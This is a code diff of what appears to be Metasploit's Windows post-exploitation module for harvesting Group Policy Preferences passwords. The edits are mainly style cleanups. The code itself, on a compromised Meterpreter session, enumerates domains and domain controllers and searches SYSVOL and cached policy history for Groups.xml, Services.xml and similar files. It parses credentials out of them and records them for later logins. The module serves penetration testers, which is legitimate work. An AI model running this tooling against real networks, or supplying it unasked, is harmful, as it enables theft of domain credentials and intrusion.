@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Post
   include Msf::Auxiliary::Report
   include Msf::Post::File
+  include Msf::Post::Windows::ExtAPI
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
   include Msf::Post::Windows::NetAPI
@@ -43,6 +44,11 @@ class MetasploitModule < Msf::Post
         ],
         'Platform' => [ 'win' ],
         'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -61,65 +67,65 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    group_path = "MACHINE\\Preferences\\Groups\\Groups.xml"
-    group_path_user = "USER\\Preferences\\Groups\\Groups.xml"
-    service_path = "MACHINE\\Preferences\\Services\\Services.xml"
-    printer_path = "USER\\Preferences\\Printers\\Printers.xml"
-    drive_path = "USER\\Preferences\\Drives\\Drives.xml"
-    datasource_path = "MACHINE\\Preferences\\Datasources\\DataSources.xml"
-    datasource_path_user = "USER\\Preferences\\Datasources\\DataSources.xml"
-    task_path = "MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"
-    task_path_user = "USER\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"
+    group_path = 'MACHINE\\Preferences\\Groups\\Groups.xml'
+    group_path_user = 'USER\\Preferences\\Groups\\Groups.xml'
+    service_path = 'MACHINE\\Preferences\\Services\\Services.xml'
+    printer_path = 'USER\\Preferences\\Printers\\Printers.xml'
+    drive_path = 'USER\\Preferences\\Drives\\Drives.xml'
+    datasource_path = 'MACHINE\\Preferences\\Datasources\\DataSources.xml'
+    datasource_path_user = 'USER\\Preferences\\Datasources\\DataSources.xml'
+    task_path = 'MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml'
+    task_path_user = 'USER\\Preferences\\ScheduledTasks\\ScheduledTasks.xml'
 
     domains = []
     basepaths = []
     fullpaths = []
 
-    print_status "Checking for group policy history objects..."
-    all_users = get_env("%ALLUSERSPROFILE%")
+    print_status('Checking for group policy history objects...')
+    all_users = get_env('%ALLUSERSPROFILE%')
 
     unless all_users.include? 'ProgramData'
       all_users = "#{all_users}\\Application Data"
     end
 
-    cached = get_basepaths("#{all_users}\\Microsoft\\Group Policy\\History", true)
+    cached = get_basepaths("#{all_users}\\Microsoft\\Group Policy\\History", cached: true)
 
     unless cached.blank?
       basepaths << cached
-      print_good "Cached Group Policy folder found locally"
+      print_good('Cached Group Policy folder found locally')
     end
 
-    print_status "Checking for SYSVOL locally..."
-    system_root = expand_path("%SYSTEMROOT%")
+    print_status('Checking for SYSVOL locally...')
+    system_root = expand_path('%SYSTEMROOT%')
     locals = get_basepaths("#{system_root}\\SYSVOL\\sysvol")
     unless locals.blank?
       basepaths << locals
-      print_good "SYSVOL Group Policy Files found locally"
+      print_good('SYSVOL Group Policy Files found locally')
     end
 
     # If user supplied domains this implicitly cancels the ALL flag.
-    if datastore['ALL'] and datastore['DOMAINS'].blank?
-      print_status "Enumerating Domains on the Network..."
+    if datastore['ALL'] && datastore['DOMAINS'].blank?
+      print_status('Enumerating Domains on the Network...')
       domains = enum_domains
-      domains.reject! { |n| n == "WORKGROUP" || n.to_s.empty? }
+      domains.reject! { |n| n == 'WORKGROUP' || n.to_s.empty? }
     end
 
     # Add user specified domains to list.
     unless datastore['DOMAINS'].blank?
       if datastore['DOMAINS'].match(/\./)
-        print_error "DOMAINS must not contain DNS style domain names e.g. 'mydomain.net'. Instead use 'mydomain'."
+        print_error("DOMAINS must not contain DNS style domain names e.g. 'mydomain.net'. Instead use 'mydomain'.")
         return
       end
       user_domains = datastore['DOMAINS'].split(' ')
-      user_domains = user_domains.map { |x| x.upcase }
-      print_status "Enumerating the user supplied Domain(s): #{user_domains.join(', ')}..."
+      user_domains = user_domains.map(&:upcase)
+      print_status("Enumerating the user supplied Domain(s): #{user_domains.join(', ')}...")
       user_domains.each { |ud| domains << ud }
     end
 
     # If we find a local policy store then assume we are on DC and do not wish to enumerate the current DC again.
     # If user supplied domains we do not wish to enumerate registry retrieved domains.
     if locals.blank? && user_domains.blank?
-      print_status "Enumerating domain information from the local registry..."
+      print_status('Enumerating domain information from the local registry...')
       domains << get_domain_reg
     end
 
@@ -135,7 +141,7 @@ class MetasploitModule < Msf::Post
       dcs = [] if dcs.nil?
 
       # Add registry cached DC for the test case where no DC is enumerated on the network.
-      if !cached_dc.nil? && (cached_dc.include? domain)
+      if !cached_dc.nil? && cached_dc.include?(domain)
         dcs << cached_dc
       end
 
@@ -144,21 +150,21 @@ class MetasploitModule < Msf::Post
       dcs.uniq!
       tbase = []
       dcs.each do |dc|
-        print_status "Searching for Policy Share on #{dc}..."
+        print_status("Searching for Policy Share on #{dc}...")
         tbase = get_basepaths("\\\\#{dc}\\SYSVOL")
         # If we got a basepath from the DC we know that we can reach it
         # All DCs on the same domain should be the same so we only need one
-        unless tbase.blank?
-          print_good "Found Policy Share on #{dc}"
-          basepaths << tbase
-          break
-        end
+        next if tbase.blank?
+
+        print_good("Found Policy Share on #{dc}")
+        basepaths << tbase
+        break
       end
     end
 
     basepaths.flatten!
     basepaths.compact!
-    print_status "Searching for Group Policy XML Files..."
+    print_status('Searching for Group Policy XML Files...')
     basepaths.each do |policy_path|
       fullpaths << find_path(policy_path, group_path)
       fullpaths << find_path(policy_path, group_path_user)
@@ -178,7 +184,7 @@ class MetasploitModule < Msf::Post
     end
   end
 
-  def get_basepaths(base, cached = false)
+  def get_basepaths(base, cached: false)
     locals = []
     begin
       session.fs.dir.foreach(base) do |sub|
@@ -219,63 +225,61 @@ class MetasploitModule < Msf::Post
   end
 
   def adsi_query(domain, adsi_filter, adsi_fields)
-    return "" unless session.core.use("extapi")
+    return '' unless session.commands.include?(Rex::Post::Meterpreter::Extensions::Extapi::COMMAND_ID_EXTAPI_ADSI_DOMAIN_QUERY)
 
     query_result = session.extapi.adsi.domain_query(domain, adsi_filter, 255, 255, adsi_fields)
 
     if query_result[:results].empty?
-      return "" # adsi query failed
+      return '' # adsi query failed
     else
       return query_result[:results]
     end
   end
 
   def gpp_xml_file(path)
-    begin
-      data = read_file(path)
+    data = read_file(path)
 
-      spath = path.split('\\')
-      retobj = {
-        :dc => spath[2],
-        :guid => spath[6],
-        :path => path,
-        :xml => data
-      }
-      if spath[4] == "sysvol"
-        retobj[:domain] = spath[5]
-      else
-        retobj[:domain] = spath[4]
-      end
-
-      adsi_filter_gpo = "(&(objectCategory=groupPolicyContainer)(name=#{retobj[:guid]}))"
-      adsi_field_gpo = ['displayname', 'name']
-
-      gpo_adsi = adsi_query(retobj[:domain], adsi_filter_gpo, adsi_field_gpo)
-
-      unless gpo_adsi.empty?
-        gpo_name = gpo_adsi[0][0][:value]
-        gpo_guid = gpo_adsi[0][1][:value]
-        retobj[:name] = gpo_name if retobj[:guid] == gpo_guid
-      end
-
-      return retobj
-    rescue Rex::Post::Meterpreter::RequestError => e
-      print_error "Received error code #{e.code} when reading #{path}"
-      return nil
+    spath = path.split('\\')
+    retobj = {
+      dc: spath[2],
+      guid: spath[6],
+      path: path,
+      xml: data
+    }
+    if spath[4] == 'sysvol'
+      retobj[:domain] = spath[5]
+    else
+      retobj[:domain] = spath[4]
     end
+
+    adsi_filter_gpo = "(&(objectCategory=groupPolicyContainer)(name=#{retobj[:guid]}))"
+    adsi_field_gpo = ['displayname', 'name']
+
+    gpo_adsi = adsi_query(retobj[:domain], adsi_filter_gpo, adsi_field_gpo)
+
+    unless gpo_adsi.empty?
+      gpo_name = gpo_adsi[0][0][:value]
+      gpo_guid = gpo_adsi[0][1][:value]
+      retobj[:name] = gpo_name if retobj[:guid] == gpo_guid
+    end
+
+    return retobj
+  rescue Rex::Post::Meterpreter::RequestError => e
+    print_error "Received error code #{e.code} when reading #{path}"
+    return nil
   end
 
   def parse_xml(xmlfile)
     mxml = xmlfile[:xml]
-    print_status "Parsing file: #{xmlfile[:path]} ..."
-    filetype = File.basename(xmlfile[:path].gsub("\\", "/"))
+    print_status("Parsing file: #{xmlfile[:path]} ...")
+    filetype = File.basename(xmlfile[:path].gsub('\\', '/'))
     results = Rex::Parser::GPP.parse(mxml)
 
     tables = Rex::Parser::GPP.create_tables(results, filetype, xmlfile[:domain], xmlfile[:dc])
 
     tables.each do |table|
       table << ['NAME', xmlfile[:name]] if xmlfile.member?(:name)
-      print_good " #{table.to_s}\n\n"
+      print_good(" #{table}\n\n")
     end
 
     results.each do |result|
@@ -289,19 +293,19 @@ class MetasploitModule < Msf::Post
     end
   end
 
-  def report_creds(user, password, disabled)
+  def report_creds(user, password, _disabled)
     service_data = {
       address: session.session_host,
       port: 445,
-      protocol: "tcp",
-      service_name: "smb",
+      protocol: 'tcp',
+      service_name: 'smb',
       workspace_id: myworkspace_id
     }
 
     credential_data = {
       origin_type: :session,
       session_id: session_db_id,
-      post_reference_name: self.refname,
+      post_reference_name: refname,
       username: user,
       private_data: password,
       private_type: :password
@@ -311,7 +315,7 @@ class MetasploitModule < Msf::Post
 
     login_data = {
       core: credential_core,
-      access_level: "User",
+      access_level: 'User',
       status: Metasploit::Model::Login::Status::UNTRIED
     }
 
@@ -338,7 +342,7 @@ class MetasploitModule < Msf::Post
     hostnames = nil
     # Prevent crash if FQDN domain names are searched for or other disallowed characters:
     # http://support.microsoft.com/kb/909264 \/:*?"<>|
-    if domain =~ /[:\*?"<>\\\/.]/
+    if domain =~ %r{[:*?"<>\\/.]}
       print_error("Cannot enumerate domain name contains disallowed characters: #{domain}")
       return nil
     end
@@ -351,7 +355,7 @@ class MetasploitModule < Msf::Post
     else
       hostnames = []
       results.each do |dc|
-        print_good "DC Found: #{dc[:name]}"
+        print_good("DC Found: #{dc[:name]}")
         hostnames << dc[:name]
       end
     end
@@ -362,28 +366,26 @@ class MetasploitModule < Msf::Post
   # We use this for the odd test case where a DC is unable to be enumerated from the network
   # but is cached in the registry.
   def get_cached_domain_controller
-    begin
-      subkey = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\"
-      v_name = "DCName"
-      dc = registry_getvaldata(subkey, v_name).gsub(/\\/, '').upcase
-      print_status "Retrieved DC #{dc} from registry"
-      return dc
-    rescue
-      print_status("No DC found in registry")
-    end
+    subkey = 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\'
+    v_name = 'DCName'
+    dc = registry_getvaldata(subkey, v_name).gsub(/\\/, '').upcase
+    print_status("Retrieved DC #{dc} from registry")
+    return dc
+  rescue StandardError
+    print_status('No DC found in registry')
   end
 
   def get_domain_reg
     locations = []
     # Lots of redundancy but hey this is quick!
-    locations << ["HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\", "Domain"]
-    locations << ["HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\", "DefaultDomainName"]
-    locations << ["HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\", "MachineDomain"]
+    locations << ['HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\', 'Domain']
+    locations << ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\', 'DefaultDomainName']
+    locations << ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\', 'MachineDomain']
 
     domains = []
 
     # Pulls cached domains from registry
-    domain_cache = registry_enumvals("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\DomainCache\\")
+    domain_cache = registry_enumvals('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\DomainCache\\')
     if domain_cache
       domain_cache.each { |ud| domains << ud }
     end
@@ -404,7 +406,7 @@ class MetasploitModule < Msf::Post
     end
 
     domains.uniq!
-    print_status "Retrieved Domain(s) #{domains.join(', ')} from registry"
+    print_status("Retrieved Domain(s) #{domains.join(', ')} from registry")
 
     return domains
   end
